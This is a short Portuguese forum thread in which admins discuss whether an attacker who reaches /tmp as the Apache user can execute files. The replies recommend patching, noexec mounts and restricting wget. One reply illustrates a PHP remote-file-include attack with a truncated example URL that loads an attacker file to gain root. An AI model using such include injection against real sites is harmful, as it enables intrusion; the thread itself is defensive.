+ Responder ao Tópico



  1. #1
    Admin7878787
    Visitante

    Padrão PERMISSOES /TMP

    Senhores ....

    gostaria de tirar uma duvida , como sabem , um invasor pode obter acesso explorando uma falha no apache , e por veiz , caindo em /tmp como usuario apache , mas lah , ele nao pode executar arkivos , soh deletar / criar --> ae vem minha pergunta , existe uma maneira do invasor conseguiur permissoes para Executar arkivos ae dentro ?

  2. #2
    nafre
    Visitante

    Padrão PERMISSOES /TMP

    basta ele explorar alguma falha!

    para tentar evitar isto use sempre as versões mais atualizadas!



  3. #3
    dadadad
    Visitante

    Padrão PERMISSOES /TMP

    exat o, q falha ele pode usar ?

  4. #4
    The-shadow
    Visitante

    Padrão é...

    oi faça um "ls -al /var | grep tmp"

    vc tb montou a partição /var com a flag no exec?
    o /var/tmp tb é world writtable!

    o invasor n usa falha nunuma no apache, mas sim no codigo do site, agora eles estão na moda do include :P
    http://www.seu_site.com/index.php?pa...a_executar.txt
    e assim eles executam o exploit e conseguem root
    basta montar as partiçoes com a flag no exec, chmod 700 no wget e um kernel actualizado, eles nc mais vao conseguir fazer nd..

    Cumps